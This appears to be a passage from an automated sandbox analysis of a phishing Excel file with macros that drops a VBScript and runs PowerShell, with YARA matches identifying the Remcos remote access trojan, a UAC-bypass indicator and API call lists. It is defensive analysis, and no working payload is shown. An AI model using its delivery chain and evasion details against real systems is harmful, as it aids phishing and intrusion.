Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004398D8	19_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_004498E0	19_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044A886	19_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0043DA09	19_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00438D5E	19_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00449ED0	19_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0041FE83	19_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00430F54	19_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004050C2	21_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004014AB	21_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00405133	21_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004051A4	21_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00401246	21_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0040CA46	21_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00405235	21_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004032C8	21_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00401689	21_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00402F60	21_2_00402F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001F8EB8	22_2_001F8EB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001F9788	22_2_001F9788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_001F8B70	22_2_001F8B70

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

OLE indicator, VBA macros: true

Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00416760 appears 69 times

Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 680, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: bhv4625.tmp.18.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@27/43@32/8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

18_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		16_2_00417952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,		21_2_00410DE1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

18_2_00418758

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

16_2_0040F474

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

16_2_0041B4A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

16_2_0041AA4A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\1E630000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR758C.tmp

Jump to behavior

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	OLE indicator, Workbook stream: true
Source: 1E630000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8........W..............................................T..........s............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8........W......................................................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................U..........................s....................f..........s............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................Y..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................./..........................s....................b.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................;..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........M..........................s............(....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................Y..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................k..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................w..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................T.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................b.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................*..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................7..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................J..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................W..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................i..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................w..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................T.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................f..........s............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8..................................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8......./..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................<..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8.......P..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8.......]..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8.......o..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8.......{..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8..................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8..................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................8..................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................8..................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................I..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................U..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......g..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................s..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................P..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................P..................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................P..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................P..................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................1..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................>..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......P..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................^..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................q..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................}..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................n..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................z..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................f.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................f.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................."..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................@..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................L..........................s............(...............................
